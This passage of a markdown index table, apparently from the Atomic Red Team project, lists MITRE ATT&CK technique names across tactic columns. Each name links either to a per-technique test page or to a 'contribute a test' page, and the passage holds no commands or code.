| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Launchd](../../T1053.004/T1053.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
